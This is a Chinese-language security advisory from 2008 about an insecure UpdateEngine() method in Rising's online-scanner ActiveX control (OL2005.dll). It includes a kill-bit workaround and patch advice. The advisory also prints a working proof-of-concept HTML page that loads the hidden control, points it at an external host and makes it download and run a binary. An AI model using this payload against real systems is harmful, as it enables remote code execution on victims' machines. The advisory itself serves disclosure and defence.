发布日期：2008-02-25
更新日期：2008-02-27

受影响系统：

Rising OL2005.dll 18.0.0.7

描述：

---

BUGTRAQ  ID: 27997

瑞星是中国的一家非常著名的杀毒软件厂商。

瑞星的在线查毒服务ActiveX控件实现上存在漏洞，远程攻击者可能利用此漏洞控制用户系统。

瑞星在其主站提供了免费在线查毒服务（http://online.rising.com.cn/free/index.htm ）。在执行免费查毒时，站点会要求用户安装Rising Web Scan Object ActiveX控件（OL2005.dll）。该控件的UpdateEngine()方式没有正确地验证某些参数输入，可能导致向用户系统上下载并加载恶意的二进制程序。

<*来源：john smith （edward11@postmaster.co.uk）
  
  链接：http://secunia.com/advisories/29109/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>
<head><title>Rising Online Scanner Insecure Method Vulnerability</title></head>
<body>
<object style="display:none" classid="clsid:E4E2F180-CB8B-4DE9-ACBB-DA745D3BA153" height="265" id="rav" width="430" VIEWASTEXT>
<param NAME="BackColor" VALUE="#ECECEC">
<param NAME="ForeColor" VALUE="#000000">
</object>
<script>
function test()
{
rav.BaseURL = "http://jsmith080220.googlepages.com/";
rav.Encardid = "0000$0000$0000";
rav.UpdateEngine();
}
</script>
<input type="button" value=" Go " onclick="test()"><br><br>
wait for a few seconds after clicking the button
</body></html>

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 为clsid：E4E2F180-CB8B-4DE9-ACBB-DA745D3BA153设置kill bit。

厂商补丁：

Rising
------
目前厂商已经在最新版本的软件中修复了这个安全问题，请到厂商的主页下载：

http://online.rising.com.cn/

浏览次数：2615
严重程度：0（网友投票）